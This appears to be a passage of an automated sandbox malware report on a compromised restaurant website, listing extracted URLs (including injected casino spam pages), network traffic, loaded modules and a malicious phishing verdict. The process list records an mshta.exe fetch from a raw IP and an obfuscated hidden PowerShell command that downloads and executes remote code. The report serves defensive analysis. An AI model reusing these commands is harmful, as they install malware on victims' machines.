Source: mshta.exe, 00000015.00000003.1946884279.00000214A7AC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000003.1941804849.00000214A7AC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: chromecache_205.1.dr	String found in binary or memory: https://maps.googleapis.com/maps/api/js?
Source: chromecache_168.1.dr	String found in binary or memory: https://modernizr.com/download?-cssanimations-csstransitions-touchevents-domprefixes-prefixed-prefix
Source: powershell.exe, 00000016.00000002.2000250119.0000021C53A83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2000250119.0000021C53BC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1990241947.0000021C45404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: chromecache_189.1.dr	String found in binary or memory: https://ordering.chownow.com/order/20536/locations/55614
Source: chromecache_189.1.dr	String found in binary or memory: https://ordering.chownow.com/order/20536/locations?add_cn_ordering_class=true
Source: chromecache_168.1.dr	String found in binary or memory: https://player.vimeo.com/api/player.js
Source: chromecache_189.1.dr	String found in binary or memory: https://russiaeu.ru/
Source: chromecache_189.1.dr	String found in binary or memory: https://schema.org
Source: chromecache_189.1.dr	String found in binary or memory: https://schema.org/Blog
Source: chromecache_189.1.dr	String found in binary or memory: https://schema.org/SiteNavigationElement
Source: chromecache_189.1.dr	String found in binary or memory: https://schema.org/VideoObject
Source: chromecache_189.1.dr	String found in binary or memory: https://schema.org/WPFooter
Source: chromecache_189.1.dr	String found in binary or memory: https://schema.org/WPHeader
Source: chromecache_189.1.dr	String found in binary or memory: https://schema.org/WebPage
Source: chromecache_189.1.dr	String found in binary or memory: https://sterlingfoodhall.menu/ordernow?menu=70dff0fc-5bba-4b68-b587-a5fca0b4fa20
Source: chromecache_183.1.dr	String found in binary or memory: https://t.dtscout.com/pv/
Source: chromecache_189.1.dr	String found in binary or memory: https://tdsworkout.com/js
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/#/schema/logo/image/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/#breadcrumb
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/#organization
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/#primaryimage
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/#website
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/?s=
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/catering-and-events/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/comments/feed/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/contact/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/feed/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/food-truck-catering/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/food-truck-menu/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/gillson-beach-menu/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/page/1bet-benutzeroberflache-und-spielerlebnis/index.html
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/page/1win-oferece-bonus-e-promocoes/index.html
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/page/analise-5win-cassino-online/index.html
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/page/aviator-game-insights-kenya/index.html
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/page/aviator-game-player-benefits/index.html
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/page/aviator-oyununun-xususiyyatlari/index.html
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/page/big-bass-splash-slot-mechanics/index.html
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/page/fortune-gems-jili-games-slot-review/index.html
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/page/glory-casino-online-games/index.html
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/page/plataforma-136bet-cassino-online/index.html
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/pre-hire-application/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/restaurant-menu/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/revival-food-hall-menu/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/schedule
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/schedule/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/story/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/story/press/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-admin/admin-ajax.php
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/cache/min/1/wp-content/themes/jupiter/assets/js/components-full
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/cache/min/1/wp-content/themes/jupiter/assets/js/core-scripts.6.
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/cache/min/1/wp-content/themes/jupiter/assets/js/plugins/wp-enqu
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/cache/min/1/wp-content/themes/jupiter/header-builder/includes/a
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/plugins/js_composer_theme/assets/js/dist/js_composer_front.min.
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/plugins/jupiter-donut/assets/js/shortcodes-scripts.min.js?ver=1
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/plugins/revslider/sr6/assets/assets/coloredbg.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/plugins/wp-rocket/assets/img/youtube.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/plugins/wp-rocket/assets/js/lazyload/17.8.3/lazyload.min.js
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/themes/jupiter
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/themes/jupiter/assets/images
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/themes/jupiter/assets/images/pre_code.gif
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/themes/jupiter/assets/images/selectbox-arrow.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/themes/jupiter/assets/js
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/themes/jupiter/assets/js/plugins/wp-enqueue/webfontloader.js?ve
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2013/01/logo1.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2013/03/logo.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2018/04/grilled-cheese1.jpg
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2018/04/logo21.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2018/04/revival-1024x768.jpeg
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2018/04/revival-736x414.jpeg
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2018/04/revival.jpeg
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2018/06/fatshallottruck-274x300.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2018/06/fatshallottruck.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2019/05/fat-shallot-chicago-tall-274x300.jpg
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2019/05/fat-shallot-chicago-tall.jpg
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2022/02/fat-shallot-gillson-beach-274x300.jpg
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2022/02/fat-shallot-gillson-beach.jpg
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2023/02/fat-shallot-merchandise-mart-274x300.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2023/02/fat-shallot-merchandise-mart.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2024/09/503a7540-1.jpg
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2024/09/503a7965-1.jpg
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2025/04/fat-shallot-gillson-beach-menu-spring-2025.pdf
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2025/04/fat-shallot-lincoln-park-spring-2025.pdf
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2025/04/fat-shallot-merchandise-mart-menu-spring-2025.p
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2025/04/fat-shallot-sterling-menu-spring-2025.pdf
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2025/04/untitled-design-1-274x300.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2025/04/untitled-design-1.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2025/04/untitled-design-274x300.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2025/04/untitled-design.png
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/2025/08/tfs-evanston-menu-825.pdf
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-content/uploads/revslider/Truck/img_1055_2-1-1024x768.jpg
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-json/
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthefatshallot.com%2F
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthefatshallot.com%2F&forma
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/wp-json/wp/v2/pages/5441
Source: chromecache_189.1.dr	String found in binary or memory: https://thefatshallot.com/xmlrpc.php?rsd
Source: chromecache_189.1.dr	String found in binary or memory: https://toucheurope.org/
Source: chromecache_189.1.dr	String found in binary or memory: https://urldefense.proofpoint.com/v2/url?u=https-3A__ordering.chownow.com_order_20536_locations_5561
Source: chromecache_158.1.dr	String found in binary or memory: https://use.typekit.net
Source: chromecache_148.1.dr	String found in binary or memory: https://voicemod.net/ltc/tx/050a4783d56adcd7da1a2dca470cc39ebc21dbfbb3344abcadd53f3dccc11fda/
Source: chromecache_189.1.dr	String found in binary or memory: https://wp-rocket.me
Source: chromecache_189.1.dr	String found in binary or memory: https://wseven.info/
Source: chromecache_148.1.dr	String found in binary or memory: https://www.cloudflare.com/?utm_source=challenge&utm_campaign=m
Source: chromecache_155.1.dr, chromecache_203.1.dr	String found in binary or memory: https://www.cloudflare.com/privacypolicy/
Source: chromecache_155.1.dr, chromecache_203.1.dr	String found in binary or memory: https://www.cloudflare.com/products/turnstile/?utm_source=turnstile&utm_campaign=widget
Source: chromecache_203.1.dr	String found in binary or memory: https://www.cloudflare.com/ru-ru/website-terms/
Source: chromecache_155.1.dr	String found in binary or memory: https://www.cloudflare.com/website-terms/
Source: chromecache_175.1.dr	String found in binary or memory: https://www.themepunch.com/links/slider_revolution_wordpress_regular_license
Source: chromecache_175.1.dr	String found in binary or memory: https://www.themepunch.com/support-center
Source: chromecache_168.1.dr	String found in binary or memory: https://www.youtube-nocookie.com/embed/$4
Source: chromecache_189.1.dr	String found in binary or memory: https://www.youtube.com
Source: chromecache_189.1.dr	String found in binary or memory: https://www.youtube.com/embed/7WY5eJ2A_3k
Source: chromecache_189.1.dr	String found in binary or memory: https://www.youtube.com/embed/7WY5eJ2A_3k?feature=oembed
Source: chromecache_189.1.dr	String found in binary or memory: https://www.youtube.com/embed/ZmAIZd098o8
Source: chromecache_189.1.dr	String found in binary or memory: https://www.youtube.com/embed/ZmAIZd098o8?feature=oembed
Source: chromecache_205.1.dr, chromecache_168.1.dr	String found in binary or memory: https://www.youtube.com/iframe_api
Source: chromecache_189.1.dr	String found in binary or memory: https://yoast.com/wordpress/plugins/seo/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 135.233.95.144:443 -> 192.168.3.5:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 135.233.95.144:443 -> 192.168.3.5:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.21.22.99:443 -> 192.168.3.5:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.21.22.144:443 -> 192.168.3.5:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.21.22.144:443 -> 192.168.3.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.42.73.26:443 -> 192.168.3.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.3.5:49762 version: TLS 1.2

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal76.phis.evad.win@24/145@48/19

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ODUD3N93\rtdx[1].dat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3pgm15a.hdq.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: \KnownDlls\mscoree.dll

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2008,i,9504170494183847832,12662986565588292661,262144 --variations-seed-version=20250317-182044.899000 --mojo-platform-channel-handle=2072 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://thefatshallot.com/"
Source: unknown	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" http://141.0x62.80.175/rtdx.dat
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2008,i,9504170494183847832,12662986565588292661,262144 --variations-seed-version=20250317-182044.899000 --mojo-platform-channel-handle=2072 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)"	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
